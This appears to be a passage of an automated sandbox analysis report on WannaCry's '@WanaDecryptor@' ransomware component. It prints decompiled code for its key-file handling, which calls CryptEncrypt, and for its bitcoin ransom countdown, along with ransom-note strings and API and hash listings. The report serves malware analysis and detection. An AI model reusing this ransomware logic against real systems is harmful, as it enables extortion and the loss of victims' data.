                                  • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
                                  • You have a new message:, xrefs: 00401877
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
                                  • String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
                                  • API String ID: 2207195628-1375496427
                                  • Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                  • Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
                                  • Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                  • Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004012E0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 202fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 54%
                                  			E004012E0(void* __ecx) {
				int _v4;
				intOrPtr _v12;
				void _v2059;
				void _v2060;
				void _v2192;
				void _v2196;
				intOrPtr _v2324;
				void _v2328;
				void _v2332;
				char _v2364;
				char _v2396;
				char _v2436;
				char _v2468;
				char _v2508;
				char _v2540;
				intOrPtr _t61;
				long _t65;
				struct _IO_FILE* _t68;
				struct _IO_FILE* _t76;
				struct _IO_FILE* _t83;
				int _t85;
				intOrPtr _t88;
				struct _IO_FILE* _t91;
				int _t97;
				void* _t100;
				char* _t123;
				void _t131;
				struct _IO_FILE* _t143;
				struct _IO_FILE* _t146;
				struct _IO_FILE* _t149;
				void* _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t161;
				void* _t164;
				void* _t166;
				void* _t169;
				void* _t172;

				_push(0xffffffff);
				_push(E004134A6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t161;
				_t61 =  *0x42189c; // 0x19f608
				_push(_t156);
				_t154 = __ecx;
				_t3 = _t61 + 0x50c; // 0x19fb14
				_t100 = _t3;
				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
				_t164 = _t161 - 0x9e0 + 0x18;
				_t65 = GetFileAttributesA( &_v2540); // executed
				_t157 = _t156 | 0xffffffff;
				if(_t65 == _t157) {
					L4:
					_v2196 = 0;
					memset( &_v2192, 0, 0x21 << 2);
					_t68 = fopen("00000000.res", "rb"); // executed
					_t143 = _t68;
					_t166 = _t164 + 0x14;
					__eflags = _t143;
					if(_t143 != 0) {
						fread( &_v2196, 0x88, 1, _t143); // executed
						fclose(_t143); // executed
						_v2332 = 0;
						memset( &_v2328, 0, 0x21 << 2);
						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
						_t76 = fopen( &_v2364, "rb"); // executed
						_t146 = _t76;
						_t169 = _t166 + 0x34;
						__eflags = _t146;
						if(_t146 != 0) {
							fread( &_v2332, 0x88, 1, _t146); // executed
							fclose(_t146);
							_t131 =  *0x421798; // 0x0
							_v2060 = _t131;
							memset( &_v2059, 0, 0x1ff << 2);
							asm("stosw");
							asm("stosb");
							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
							_t83 = fopen( &_v2396, "rb"); // executed
							_t149 = _t83;
							_t172 = _t169 + 0x34;
							__eflags = _t149;
							if(_t149 != 0) {
								_t85 = fread( &_v2060, 1, 0x800, _t149); // executed
								fclose(_t149);
								_t39 = _t100 + 0x242; // 0x19fd56
								_t40 = _t100 + 0x1de; // 0x19fcf2
								E0040BE90("s.wnry", _t40, _t39);
								_t88 =  *0x42189c; // 0x19f608
								_push( *((intOrPtr*)(_t154 + 0x20)));
								_push( &_v2540);
								_push( *((intOrPtr*)(_t88 + 0x818)));
								_push( *((intOrPtr*)(_t88 + 0x81c)));
								_t46 = _t100 + 0xb2; // 0x19fbc6
								_push(_t85);
								_push( &_v2060);
								_push(_v2324);
								_push( &_v2332);
								_push( &_v2196);
								_push(_t100 + 0xe4);
								_t91 = E0040C240( &_v2332, __eflags);
								_t172 = _t172 + 0x4c;
								_t83 = E0040C670();
								__eflags = _t91;
								if(_t91 >= 0) {
									E00404640( &_v2436);
									_v4 = 1;
									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
									__eflags = _t94;
									if(_t94 == 0) {
										 *(_t154 + 0xa8) = 1;
									} else {
										 *(_t154 + 0xa8) = 2;
									}
									_v4 = 0xffffffff;
									_t123 =  &_v2436;
									goto L15;
								}
							} else {
								 *(_t154 + 0xa8) = 0xffffffff;
							}
						} else {
							 *(_t154 + 0xa8) = 0xffffffff;
						}
					} else {
						 *(_t154 + 0xa8) = _t157;
					}
				} else {
					E00404640( &_v2508);
					_v4 = 0;
					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
						_t97 = DeleteFileA( &_v2540);
						_v4 = _t157;
						E00404690(_t97,  &_v2508);
						goto L4;
					} else {
						 *(_t154 + 0xa8) = 2;
						_v4 = _t157;
						_t123 =  &_v2508;
						L15:
						_t83 = E00404690(_t94, _t123);
					}
				}
				 *[fs:0x0] = _v12;
				return _t83;
			}









































                                  0x004012e6
                                  0x004012e8
                                  0x004012ed
                                  0x004012ee
                                  0x004012fb
                                  0x00401305
                                  0x00401307
                                  0x00401316
                                  0x00401316
                                  0x00401323
                                  0x00401339
                                  0x0040133b
                                  0x00401343
                                  0x00401349
                                  0x0040134e
                                  0x004013b0
                                  0x004013be
                                  0x004013d3
                                  0x004013d5
                                  0x004013db
                                  0x004013dd
                                  0x004013e0
                                  0x004013e2
                                  0x00401405
                                  0x00401408
                                  0x0040141c
                                  0x00401427
                                  0x00401440
                                  0x00401453
                                  0x00401459
                                  0x0040145b
                                  0x0040145e
                                  0x00401460
                                  0x00401481
                                  0x00401484
                                  0x0040148a
                                  0x0040149e
                                  0x004014a8
                                  0x004014aa
                                  0x004014ac
                                  0x004014c1
                                  0x004014d4
                                  0x004014da
                                  0x004014dc
                                  0x004014df
                                  0x004014e1
                                  0x00401502
                                  0x00401507
                                  0x0040150d
                                  0x00401513
                                  0x00401520
                                  0x00401525
                                  0x0040152d
                                  0x0040153e
                                  0x0040153f
                                  0x00401547
                                  0x00401548
                                  0x00401556
                                  0x00401557
                                  0x0040155f
                                  0x00401567
                                  0x0040156e
                                  0x0040156f
                                  0x00401570
                                  0x00401575
                                  0x0040157a
                                  0x0040157f
                                  0x00401581
                                  0x00401587
                                  0x004015a2
                                  0x004015a9
                                  0x004015ae
                                  0x004015b0
                                  0x004015be
                                  0x004015b2
                                  0x004015b2
                                  0x004015b2
                                  0x004015c4
                                  0x004015cf
                                  0x00000000
                                  0x004015cf
                                  0x004014e3
                                  0x004014e3
                                  0x004014e3
                                  0x00401462
                                  0x00401462
                                  0x00401462
                                  0x004013e4
                                  0x004013e4
                                  0x004013e4
                                  0x00401350
                                  0x00401354
                                  0x00401367
                                  0x00401379
                                  0x0040139a
                                  0x004013a4
                                  0x004013ab
                                  0x00000000
                                  0x0040137b
                                  0x0040137b
                                  0x00401385
                                  0x0040138c
                                  0x004015d3
                                  0x004015d3
                                  0x004015d3
                                  0x00401379
                                  0x004015e3
                                  0x004015f0

                                  APIs
                                  • sprintf.MSVCRT ref: 00401323
                                  • sprintf.MSVCRT ref: 00401339
                                  • GetFileAttributesA.KERNELBASE(?), ref: 00401343
                                  • DeleteFileA.KERNEL32(?), ref: 0040139A
                                  • fread.MSVCRT ref: 00401405
                                  • fclose.MSVCRT ref: 00401408
                                  • sprintf.MSVCRT ref: 00401440
                                  • fopen.MSVCRT ref: 00401453
                                    • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
                                  • fopen.MSVCRT ref: 004013D5
                                    • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
                                    • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000001,00000200,?,?,?,00000001,?,0019FA30), ref: 004048DB
                                    • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
                                  • String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
                                  • API String ID: 2787528210-4016014174
                                  • Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                  • Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
                                  • Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                  • Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004076A0 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 239windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 201 4076a0-4076d5 202 4076d9-407714 time 201->202 203 407716-40771c 202->203 204 40771e 202->204 205 407724-40773b 203->205 204->205 206 40775b 205->206 207 40773d-407745 205->207 210 40775f-407761 206->210 208 407747-40774d 207->208 209 40774f 207->209 213 407753-407755 208->213 209->213 211 407763-40776b 210->211 212 40776d 210->212 214 407771-407819 sprintf 211->214 212->214 213->210 215 407757-407759 213->215 216 407828-407832 214->216 217 40781b-407826 214->217 215->210 218 407833-40783c call 405180 216->218 217->218 221 407842-407892 SendMessageA * 2 #540 218->221 222 4076d7 218->222 223 4078a0-4078a8 221->223 224 407894-407896 221->224 222->202 225 4078aa-4078d9 _ftol #2818 * 2 223->225 226 4078db-40790e #2818 * 2 223->226 224->223 227 407911-40793e #3092 #6199 225->227 226->227 228 407990-4079bc #800 227->228 229 407940-407950 call 4079c0 227->229 229->228 232 407952-40798b InvalidateRect call 405920 * 2 229->232 232->228
                                  C-Code - Quality: 63%
                                  			E004076A0(void* __ecx) {
				intOrPtr _t89;
				char _t90;
				intOrPtr _t91;
				signed int _t94;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t125;
				signed int _t133;
				void* _t136;
				intOrPtr _t139;
				signed int _t143;
				signed int _t147;
				void* _t148;
				intOrPtr _t161;
				signed int _t192;
				intOrPtr _t193;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				intOrPtr _t200;
				intOrPtr _t202;
				void* _t204;
				intOrPtr _t206;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				long long _t225;

				_push(0xffffffff);
				_push(E00413EBB);
				_t89 =  *[fs:0x0];
				_push(_t89);
				 *[fs:0x0] = _t206;
				_t207 = _t206 - 0x8c;
				_t196 = 0;
				_t136 = __ecx;
				 *((intOrPtr*)(_t207 + 0x14)) = 0;
				 *((intOrPtr*)(_t207 + 0x18)) = 0;
				 *(_t207 + 0x1c) = 0;
				 *(_t207 + 0x20) = 0;
				_t204 = 0;
				L2:
				__imp__time(_t196);
				_t139 = M00421120; // 0x30303b30
				_t161 = _t89;
				_t90 = "00;00;00;00"; // 0x303b3030
				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
				 *(_t207 + 0x3c) = _t90;
				_t91 =  *0x421124; // 0x30303b
				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
				_t208 = _t207 + 4;
				 *(_t208 + 0x24) = _t196;
				memset(_t208 + 0x44, 0, 0x16 << 2);
				_t209 = _t208 + 0xc;
				if(_t204 != 0) {
					_t94 =  *(_t136 + 0x580);
				} else {
					_t94 =  *(_t136 + 0x57c);
				}
				_t98 =  *((intOrPtr*)(_t136 + 0x578));
				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
				if(_t161 <= _t98) {
					_t99 =  *(_t209 + 0x24);
				} else {
					_t133 = _t98 - _t161 + _t143;
					_t196 = _t133;
					if(_t196 <= 0) {
						_t99 =  *(_t209 + 0x24);
					} else {
						asm("cdq");
						_t99 = _t133 * 0x64 / _t143;
					}
					if(_t196 < 0) {
						_t196 = 0;
					}
				}
				if(_t204 != 0) {
					 *(_t209 + 0x20) = _t99;
				} else {
					 *(_t209 + 0x14) = _t196;
					 *(_t209 + 0x1c) = _t99;
				}
				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
				_t198 = _t197 + _t192 * 0xfffff1f0;
				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
				_t207 = _t209 + 0x18;
				if(_t204 != 0) {
					_t148 = _t136 + 0x444;
					_push(_t207 + 0x38);
				} else {
					_push(_t207 + 0x38);
					_t148 = _t136 + 0x3c8;
				}
				_t89 = E00405180(_t148);
				_t204 = _t204 + 1;
				if(_t204 < 2) {
					_t196 = 0;
					goto L2;
				}
				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0); // executed
				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0); // executed
				L00412DA6();
				 *(_t207 + 0xa4) = 0;
				_t225 =  *((intOrPtr*)(_t136 + 0x584));
				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
					_t225 = _t225 + st0;
					 *(_t136 + 0x818) = 1;
				}
				_t124 =  *((intOrPtr*)(_t136 + 0x588));
				if(_t124 != 0) {
					 *((long long*)(_t207 + 0x14)) = _t225;
					_t200 =  *((intOrPtr*)(_t207 + 0x18));
					_t193 =  *((intOrPtr*)(_t207 + 0x14));
					_push(_t200);
					_push(_t193);
					_t124 = _t136 + 0x81c;
					_push("%.1f BTC");
					_push(_t136 + 0x81c);
					L00412E00();
					_t210 = _t207 + 0x10;
					_push(_t200);
					_push(_t193);
					_push("Send %.1f BTC to this address:");
					_push(_t210 + 0x10);
					L00412E00();
					_t211 = _t210 + 0x10;
				} else {
					L0041304A();
					_t202 = _t124;
					_push(_t202);
					_push("$%d");
					_push(_t136 + 0x81c);
					L00412E00();
					_t213 = _t207 + 0xc;
					_push(_t202);
					_push("Send $%d worth of bitcoin to this address:");
					_push(_t213 + 0x10);
					L00412E00();
					_t211 = _t213 + 0xc;
				}
				_push( *((intOrPtr*)(_t211 + 0x10)));
				_push(0x402);
				L00412CE6();
				L00412CE0(); // executed
				_t125 =  *((intOrPtr*)(_t136 + 0x824));
				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
				if(_t125 != 0x121284) {
					E004079C0(_t136);
					_t125 =  *((intOrPtr*)(_t211 + 0xac));
					if(_t125 != 0) {
						InvalidateRect( *(_t136 + 0x20), 0, 1);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
					}
				}
				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
				return _t125;
			}

































                                  0x004076a0
                                  0x004076a2
                                  0x004076a7
                                  0x004076ad
                                  0x004076ae
                                  0x004076b5
                                  0x004076be
                                  0x004076c1
                                  0x004076c3
                                  0x004076c7
                                  0x004076cb
                                  0x004076cf
                                  0x004076d3
                                  0x004076d9
                                  0x004076da
                                  0x004076e0
                                  0x004076e6
                                  0x004076e8
                                  0x004076ed
                                  0x004076f1
                                  0x004076f5
                                  0x004076fa
                                  0x004076fe
                                  0x0040770c
                                  0x00407712
                                  0x00407712
                                  0x00407714
                                  0x0040771e
                                  0x00407716
                                  0x00407716
                                  0x00407716
                                  0x00407730
                                  0x00407736
                                  0x0040773b
                                  0x0040775b
                                  0x0040773d
                                  0x0040773f
                                  0x00407741
                                  0x00407745
                                  0x0040774f
                                  0x00407747
                                  0x0040774a
                                  0x0040774b
                                  0x0040774b
                                  0x00407755
                                  0x00407757
                                  0x00407757
                                  0x00407755
                                  0x00407761
                                  0x0040776d
                                  0x00407763
                                  0x00407763
                                  0x00407767
                                  0x00407767
                                  0x00407784
                                  0x0040778d
                                  0x004077aa
                                  0x004077bf
                                  0x004077c8
                                  0x004077d6
                                  0x004077e6
                                  0x0040780e
                                  0x00407814
                                  0x00407819
                                  0x0040782c
                                  0x00407832
                                  0x0040781b
                                  0x0040781f
                                  0x00407820
                                  0x00407820
                                  0x00407833
                                  0x00407838
                                  0x0040783c
                                  0x004076d7
                                  0x00000000
                                  0x004076d7
                                  0x0040785b
                                  0x00407870
                                  0x00407876
                                  0x0040787f
                                  0x0040788a
                                  0x00407892
                                  0x00407894
                                  0x00407896
                                  0x00407896
                                  0x004078a0
                                  0x004078a8
                                  0x004078db
                                  0x004078df
                                  0x004078e3
                                  0x004078e7
                                  0x004078e8
                                  0x004078e9
                                  0x004078ef
                                  0x004078f4
                                  0x004078f5
                                  0x004078fa
                                  0x00407901
                                  0x00407902
                                  0x00407903
                                  0x00407908
                                  0x00407909
                                  0x0040790e
                                  0x004078aa
                                  0x004078aa
                                  0x004078af
                                  0x004078b7
                                  0x004078b8
                                  0x004078bd
                                  0x004078be
                                  0x004078c3
                                  0x004078ca
                                  0x004078cb
                                  0x004078d0
                                  0x004078d1
                                  0x004078d6
                                  0x004078d6
                                  0x00407917
                                  0x00407918
                                  0x0040791d
                                  0x00407924
                                  0x00407929
                                  0x0040792f
                                  0x0040793e
                                  0x00407942
                                  0x00407947
                                  0x00407950
                                  0x0040795a
                                  0x0040796c
                                  0x00407973
                                  0x00407984
                                  0x0040798b
                                  0x0040798b
                                  0x00407950
                                  0x00407994
                                  0x0040799f
                                  0x004079af
                                  0x004079bc

                                  APIs
                                  • time.MSVCRT ref: 004076DA
                                  • sprintf.MSVCRT ref: 0040780E
                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
                                  • #540.MFC42 ref: 00407876
                                  • _ftol.MSVCRT ref: 004078AA
                                  • #2818.MFC42(?,$%d,00000000), ref: 004078BE
                                  • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
                                  • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
                                  • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
                                  • #3092.MFC42(00000402,?), ref: 0040791D
                                  • #6199.MFC42(00000402,?), ref: 00407924
                                  • InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
                                  • #800.MFC42 ref: 0040799F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
                                  • String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
                                  • API String ID: 993288296-3256873439
                                  • Opcode ID: 7ae64adea42d893420969a4f625596c19cd741f426776df1d4eb6bd519e7d9e8
                                  • Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
                                  • Opcode Fuzzy Hash: 7ae64adea42d893420969a4f625596c19cd741f426776df1d4eb6bd519e7d9e8
                                  • Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004060E0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 139windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v44;
				struct HINSTANCE__* _t82;
				struct HICON__* _t83;
				intOrPtr _t119;
				intOrPtr _t124;

				_push(0xffffffff);
				_push(E00413E0B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t124;
				_push(__ecx);
				_t119 = __ecx;
				_push(_a4);
				_push(0x66);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
				_v12 = 2;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
				_v12 = 3;
				E004085C0(__ecx + 0x120);
				_v12 = 4;
				E004085C0(__ecx + 0x1a4);
				_v12 = 5;
				E00404090(__ecx + 0x228);
				_v12 = 6;
				E00404090(__ecx + 0x290);
				_v12 = 7;
				E00404090(__ecx + 0x2f8);
				_v12 = 8;
				E00404090(__ecx + 0x360);
				_v12 = 9;
				E00405000(__ecx + 0x3c8);
				_v12 = 0xa;
				E00405000(__ecx + 0x444);
				_v12 = 0xb;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
				_v12 = 0xc;
				L00412DA6();
				_v12 = 0xd;
				L00412DA6();
				_v12 = 0xe;
				L00412DA6();
				_v12 = 0xf;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x834)) = 0;
				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x844)) = 0;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x854)) = 0;
				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x864)) = 0;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x874)) = 0;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x884)) = 0;
				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
				_v12 = 0x1b;
				_t82 = E00407640(__ecx + 0x888);
				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
				 *((intOrPtr*)(__ecx + 0x894)) = 0;
				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
				_push(0x421798);
				_v12 = 0x1d;
				 *((intOrPtr*)(__ecx)) = 0x4163a0;
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				L00412E5A();
				_push(0x80);
				_push(0xe);
				L00412F2C();
				_t83 = LoadIconA(_t82, 0x80); // executed
				_push(0x421798);
				 *(_t119 + 0x82c) = _t83;
				 *((intOrPtr*)(_t119 + 0x824)) = 0;
				 *((intOrPtr*)(_t119 + 0x828)) = 0;
				 *((intOrPtr*)(_t119 + 0x818)) = 0;
				L00412DA0();
				 *((intOrPtr*)(_t119 + 0x820)) = 0;
				 *[fs:0x0] = _v44;
				return _t119;
			}










                                  0x004060e0
                                  0x004060e2
                                  0x004060ed
                                  0x004060ee
                                  0x004060f5
                                  0x004060fe
                                  0x00406100
                                  0x00406101
                                  0x00406103
                                  0x00406107
                                  0x00406113
                                  0x00406117
                                  0x0040611c
                                  0x00406128
                                  0x0040612f
                                  0x00406134
                                  0x00406140
                                  0x00406147
                                  0x0040614c
                                  0x00406158
                                  0x0040615d
                                  0x00406168
                                  0x0040616d
                                  0x00406178
                                  0x0040617d
                                  0x00406188
                                  0x0040618d
                                  0x00406198
                                  0x0040619d
                                  0x004061a8
                                  0x004061ad
                                  0x004061b8
                                  0x004061bd
                                  0x004061c8
                                  0x004061cd
                                  0x004061d8
                                  0x004061df
                                  0x004061e4
                                  0x004061f0
                                  0x004061f7
                                  0x00406202
                                  0x00406209
                                  0x00406214
                                  0x00406219
                                  0x00406224
                                  0x00406229
                                  0x00406233
                                  0x00406239
                                  0x0040623f
                                  0x00406245
                                  0x0040624b
                                  0x00406251
                                  0x00406257
                                  0x0040625d
                                  0x00406263
                                  0x00406269
                                  0x0040626f
                                  0x00406275
                                  0x0040627b
                                  0x00406281
                                  0x00406287
                                  0x0040628d
                                  0x00406293
                                  0x00406299
                                  0x0040629f
                                  0x004062a5
                                  0x004062ab
                                  0x004062b1
                                  0x004062c1
                                  0x004062c6
                                  0x004062cb
                                  0x004062d5
                                  0x004062db
                                  0x004062e5
                                  0x004062ec
                                  0x004062f1
                                  0x004062f7
                                  0x004062fc
                                  0x00406303
                                  0x00406308
                                  0x00406313
                                  0x00406318
                                  0x0040631d
                                  0x00406322
                                  0x00406329
                                  0x0040632f
                                  0x00406335
                                  0x00406340
                                  0x00406346
                                  0x0040634c
                                  0x00406352
                                  0x00406358
                                  0x00406361
                                  0x0040636d
                                  0x00406377

                                  APIs
                                  • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
